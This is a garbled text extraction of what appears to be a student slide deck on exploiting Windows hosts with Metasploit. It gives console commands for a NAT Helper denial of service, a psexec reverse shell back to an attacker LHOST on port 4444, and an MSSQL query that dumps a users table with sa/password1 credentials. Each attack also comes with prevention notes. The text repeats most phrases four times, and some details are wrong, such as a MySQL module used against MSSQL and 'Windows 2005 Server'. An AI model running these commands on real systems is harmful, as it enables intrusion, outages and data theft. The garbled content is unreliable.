� The attackers server starts the interaction with the victims The attackers server starts the interaction with the victims The attackers server starts the interaction with the victims The attackers server starts the interaction with the victims machine and attacker may be able to execute arbitrary code.machine and attacker may be able to execute arbitrary code.machine and attacker may be able to execute arbitrary code.machine and attacker may be able to execute arbitrary code.


Talkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response Attack�PreventionPreventionPreventionPrevention�Since this is a fairly new attack and it Since this is a fairly new attack and it Since this is a fairly new attack and it Since this is a fairly new attack and it

targets SP3 and below versions, there targets SP3 and below versions, there targets SP3 and below versions, there targets SP3 and below versions, there is no direct solution to prevent this.is no direct solution to prevent this.is no direct solution to prevent this.is no direct solution to prevent this.(source: (source: (source: (source: http://www.osvdb.org/64582http://www.osvdb.org/64582http://www.osvdb.org/64582http://www.osvdb.org/64582))))

�The user should avoid clicking on any The user should avoid clicking on any The user should avoid clicking on any The user should avoid clicking on any link which he cannot recognize and link which he cannot recognize and link which he cannot recognize and link which he cannot recognize and also by avoiding submitting personal also by avoiding submitting personal also by avoiding submitting personal also by avoiding submitting personal information.information.information.information.



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS NAT Helper DOS NAT Helper DOS NAT Helper DOS AAAAttackttackttackttack� Reverse Shell Attack� SQL Server Generic Exploit


NAT Helper DOS NAT Helper DOS NAT Helper DOS NAT Helper DOS AAAAttackttackttackttack

�DescriptionDescriptionDescriptionDescription

� This module exploits DOS vulnerability within This module exploits DOS vulnerability within This module exploits DOS vulnerability within This module exploits DOS vulnerability within internet connection sharing service in Win XP.internet connection sharing service in Win XP.internet connection sharing service in Win XP.internet connection sharing service in Win XP.

� This is triggered when a malformed DNS query is This is triggered when a malformed DNS query is This is triggered when a malformed DNS query is This is triggered when a malformed DNS query is sent to host computer using internet connection sent to host computer using internet connection sent to host computer using internet connection sent to host computer using internet connection sharing. An attacker can crash the remote machine sharing. An attacker can crash the remote machine sharing. An attacker can crash the remote machine sharing. An attacker can crash the remote machine resulting in a loss of availability.resulting in a loss of availability.resulting in a loss of availability.resulting in a loss of availability.

� Exploiting this may cause affected computers to Exploiting this may cause affected computers to Exploiting this may cause affected computers to Exploiting this may cause affected computers to crash, denying service to legitimate users.crash, denying service to legitimate users.crash, denying service to legitimate users.crash, denying service to legitimate users.

�ObjectiveObjectiveObjectiveObjective

� Attacker must be able to send malformed network Attacker must be able to send malformed network Attacker must be able to send malformed network Attacker must be able to send malformed network traffic interface located in the LAN side of the traffic interface located in the LAN side of the traffic interface located in the LAN side of the traffic interface located in the LAN side of the affected computer.affected computer.affected computer.affected computer.



�CommandsCommandsCommandsCommands� msf auxiliary (nat_helper)> use msf auxiliary (nat_helper)> use msf auxiliary (nat_helper)> use msf auxiliary (nat_helper)> use

auxiliary/dos/windows/nat/nat_helperauxiliary/dos/windows/nat/nat_helperauxiliary/dos/windows/nat/nat_helperauxiliary/dos/windows/nat/nat_helper� msf auxiliary (nat_helper)> set RHOST msf auxiliary (nat_helper)> set RHOST msf auxiliary (nat_helper)> set RHOST msf auxiliary (nat_helper)> set RHOST

129.63.226.112129.63.226.112129.63.226.112129.63.226.112� msf auxiliary (nat_helper)> exploitmsf auxiliary (nat_helper)> exploitmsf auxiliary (nat_helper)> exploitmsf auxiliary (nat_helper)> exploit



�PreventionPreventionPreventionPrevention

Currently there are no known Currently there are no known Currently there are no known Currently there are no known upgrades, patches or upgrades, patches or upgrades, patches or upgrades, patches or workarounds available to workarounds available to workarounds available to workarounds available to prevent this attack.prevent this attack.prevent this attack.prevent this attack.

(Source: (Source: (Source: (Source: www.osvdb.org/30096www.osvdb.org/30096www.osvdb.org/30096www.osvdb.org/30096))))



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Reverse Reverse Reverse SSSShell hell hell hell AAAAttackttackttackttack� SQL Server Generic Exploit


Reverse Reverse Reverse Reverse SSSShell hell hell hell AAAAttackttackttackttackDescriptionDescriptionDescriptionDescription� This is an active exploit which exploit a specific host, This is an active exploit which exploit a specific host, This is an active exploit which exploit a specific host, This is an active exploit which exploit a specific host,

run until completion and then exit.run until completion and then exit.run until completion and then exit.run until completion and then exit.� This exploit gains a reverse shell on target system This exploit gains a reverse shell on target system This exploit gains a reverse shell on target system This exploit gains a reverse shell on target system

given the required credentials.given the required credentials.given the required credentials.given the required credentials.� With this exploit the attacker gains the shell prompt With this exploit the attacker gains the shell prompt With this exploit the attacker gains the shell prompt With this exploit the attacker gains the shell prompt

of the victims machine and can add, delete, modify of the victims machine and can add, delete, modify of the victims machine and can add, delete, modify of the victims machine and can add, delete, modify files/folders on the victims machine. files/folders on the victims machine. files/folders on the victims machine. files/folders on the victims machine.

ObjectiveObjectiveObjectiveObjective� The exploit objective is to gain attack of the The exploit objective is to gain attack of the The exploit objective is to gain attack of the The exploit objective is to gain attack of the

shell prompt of the victims machine and can shell prompt of the victims machine and can shell prompt of the victims machine and can shell prompt of the victims machine and can add, delete, modify files/folders on the add, delete, modify files/folders on the add, delete, modify files/folders on the add, delete, modify files/folders on the victims machine. victims machine. victims machine. victims machine.


Reverse Reverse Reverse Reverse SSSShell hell hell hell AAAAttackttackttackttack

�Metasploit CommandsMetasploit CommandsMetasploit CommandsMetasploit Commands

�msf exploit(psexec)> use msf exploit(psexec)> use msf exploit(psexec)> use msf exploit(psexec)> use exploit/windows/smb/psexecexploit/windows/smb/psexecexploit/windows/smb/psexecexploit/windows/smb/psexec

�msf exploit(psexec)> set RHOST msf exploit(psexec)> set RHOST msf exploit(psexec)> set RHOST msf exploit(psexec)> set RHOST 129.63.226.112129.63.226.112129.63.226.112129.63.226.112

�msf exploit(psexec)> set payload msf exploit(psexec)> set payload msf exploit(psexec)> set payload msf exploit(psexec)> set payload windows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcp

�msf exploit(psexec)> set LHOST msf exploit(psexec)> set LHOST msf exploit(psexec)> set LHOST msf exploit(psexec)> set LHOST 129.63.226.163129.63.226.163129.63.226.163129.63.226.163

�msf exploit(psexec)> set LPORT 4444msf exploit(psexec)> set LPORT 4444msf exploit(psexec)> set LPORT 4444msf exploit(psexec)> set LPORT 4444�msf exploit(psexec)> exploitmsf exploit(psexec)> exploitmsf exploit(psexec)> exploitmsf exploit(psexec)> exploit


Reverse Reverse Reverse Reverse SSSShell hell hell hell AAAAttackttackttackttack�PreventionPreventionPreventionPrevention� It can be easily be avoided by forcing the It can be easily be avoided by forcing the It can be easily be avoided by forcing the It can be easily be avoided by forcing the

type of the network logins to be guest only.type of the network logins to be guest only.type of the network logins to be guest only.type of the network logins to be guest only. Open the control panel, click administrative Open the control panel, click administrative Open the control panel, click administrative Open the control panel, click administrative

tools, then loctools, then loctools, then loctools, then localalalal security policy, local security policy, local security policy, local security policy, local policies, security options, and find the entry policies, security options, and find the entry policies, security options, and find the entry policies, security options, and find the entry

called "Network Access: Sharing and called "Network Access: Sharing and called "Network Access: Sharing and called "Network Access: Sharing and security model for local accounts". Change security model for local accounts". Change security model for local accounts". Change security model for local accounts". Change this entry from classic to guest only.this entry from classic to guest only.this entry from classic to guest only.this entry from classic to guest only.

�(Source: (Source: (Source: (Source: http://nullpointer.dk/?q=node/49)http://nullpointer.dk/?q=node/49)http://nullpointer.dk/?q=node/49)http://nullpointer.dk/?q=node/49)



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic Exploit


SQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic Exploit�DescriptionDescriptionDescriptionDescription� This module will allow for simple SQL This module will allow for simple SQL This module will allow for simple SQL This module will allow for simple SQL

statements to be executed against a MSSQL statements to be executed against a MSSQL statements to be executed against a MSSQL statements to be executed against a MSSQL instance given the appropriate credentials.instance given the appropriate credentials.instance given the appropriate credentials.instance given the appropriate credentials.

�We can set any SQL query on attacker We can set any SQL query on attacker We can set any SQL query on attacker We can set any SQL query on attacker machine and can get the required data from machine and can get the required data from machine and can get the required data from machine and can get the required data from the victims machine. the victims machine. the victims machine. the victims machine.

�ObjectiveObjectiveObjectiveObjective�Our objective is to attack Windows 2005 Our objective is to attack Windows 2005 Our objective is to attack Windows 2005 Our objective is to attack Windows 2005

Server Database and run SQL commands to Server Database and run SQL commands to Server Database and run SQL commands to Server Database and run SQL commands to capture the data in the database.capture the data in the database.capture the data in the database.capture the data in the database.


SQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic Exploit�CommandsCommandsCommandsCommands

� msf msf msf msf auxiliary/admin/mysql/mysql_sqlauxiliary/admin/mysql/mysql_sqlauxiliary/admin/mysql/mysql_sqlauxiliary/admin/mysql/mysql_sql � msf msf msf msf auxiliaryauxiliaryauxiliaryauxiliary((((mysql_sqlmysql_sqlmysql_sqlmysql_sql)> set RHOST )> set RHOST )> set RHOST )> set RHOST

129.63.226.11129.63.226.11129.63.226.11129.63.226.110000� msf msf msf msf auxiliaryauxiliaryauxiliaryauxiliary((((mysql_sqlmysql_sqlmysql_sqlmysql_sql)> set )> set )> set )> set RPORT 1433RPORT 1433RPORT 1433RPORT 1433� msf msf msf msf auxiliaryauxiliaryauxiliaryauxiliary((((mysql_sqlmysql_sqlmysql_sqlmysql_sql)> set )> set )> set )> set Username saUsername saUsername saUsername sa� msf msf msf msf auxiliaryauxiliaryauxiliaryauxiliary((((mysql_sqlmysql_sqlmysql_sqlmysql_sql)> set )> set )> set )> set Password password1Password password1Password password1Password password1� msf exploit(psexec)> msf exploit(psexec)> msf exploit(psexec)> msf exploit(psexec)> set sql select set sql select set sql select set sql select **** from from from from

webapp.dbo.userswebapp.dbo.userswebapp.dbo.userswebapp.dbo.users� msf msf msf msf auxiliaryauxiliaryauxiliaryauxiliary((((mysql_sqlmysql_sqlmysql_sqlmysql_sql)>)>)>)>set set set set

USE_WINDOWS_AUTHENT falseUSE_WINDOWS_AUTHENT falseUSE_WINDOWS_AUTHENT falseUSE_WINDOWS_AUTHENT false� msf msf msf msf auxiliaryauxiliaryauxiliaryauxiliary((((mysql_sqlmysql_sqlmysql_sqlmysql_sql)>)>)>)> exploit exploit exploit exploit


SQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic ExploitSQL Server Generic Exploit�PreventionPreventionPreventionPrevention

�Changing the user name and Changing the user name and Changing the user name and Changing the user name and password of the database in the password of the database in the password of the database in the password of the database in the victimvictimvictimvictim’’’’s machine will prevent the s machine will prevent the s machine will prevent the s machine will prevent the attacker.attacker.attacker.attacker.

�We can also close all the RPORT We can also close all the RPORT We can also close all the RPORT We can also close all the RPORT (ports that listen on the victim(ports that listen on the victim(ports that listen on the victim(ports that listen on the victim’’’’s s s s machine).machine).machine).machine).


ReferenceReferenceReferenceReferencessss http://www.symantec.com/content/en/us/enterprise/other_resources/b-

istr_main_report_2011_21239364.en-us.pdf

http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

http://www.metasploit.com/modules/exploit/windows/browser/ms10_018_ie_behaviors

http://www.metasploit.com/modules/exploit/windows/browser/ms10_046_shortcut_icon_dllloader

http://www.metasploit.com/modules/exploit/windows/browser/ms10_002_aurora

http://www.metasploit.com/modules/auxiliary/admin/mysql/mysql_sql

http://www.metasploit.com/modules/exploit/windows/smb/psexec

http://www.metasploit.com/modules/auxiliary/dos/windows/nat/nat_helper

http://metasploit.com/modules/exploit/windows/misc/talkative_response

Documents

Exploiting with Metasploi Exploiting with Metasploit - hacking